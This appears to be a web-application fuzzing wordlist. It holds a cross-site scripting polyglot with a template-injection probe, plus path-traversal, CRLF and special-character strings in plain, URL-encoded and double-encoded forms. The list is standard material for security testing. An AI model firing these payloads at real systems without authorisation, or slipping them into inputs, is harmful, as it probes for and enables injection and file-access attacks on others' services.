'"><svg/onload=prompt(5);>{{7*7}}
${{<%[%'"}}%\
`
%60
%25%36%30
%0a
%0d
%0d%0a
%0a%0d
!
!!
//
.
..
...
.../
../
???
???/
/..;/

#
?
&
%
/
+
"
'
)
*
;
#
]
}
>
@
ÿ
$
 
%21
%27%22%3e%3c%73%76%67%2f%6f%6e%6c%6f%61%64%3d%70%72%6f%6d%70%74%28%35%29%3b%3e%7b%7b%37%2a%37%7d%7d
%21%21
%2e
%2e%2e
%2e%2e%2e
%2f%2f
%2E%2E%2F
%0B
%23
%3F
%24
%25
%2B
%22
%27
%29
%2a
%3b
%23
%5d
%7d
%3e
%40
%ff
%20
%24
%2F%2E%2E%3B%2F
%25%32%31
%25%32%31%25%32%31
%25%32%66%25%32%66
%25%32%65
%25%32%65%25%32%65
%25%32%65%25%32%65%25%32%65
%2523
%253F
%2524
%2525
%252B
%2522
%2527
%2529
%252A
%253B
%2523
%255D
%257D
%253e
%2540
%25ff
%2520
%252E%252E%252F
%252F%252E%252E%253B%252F
%25%32%34
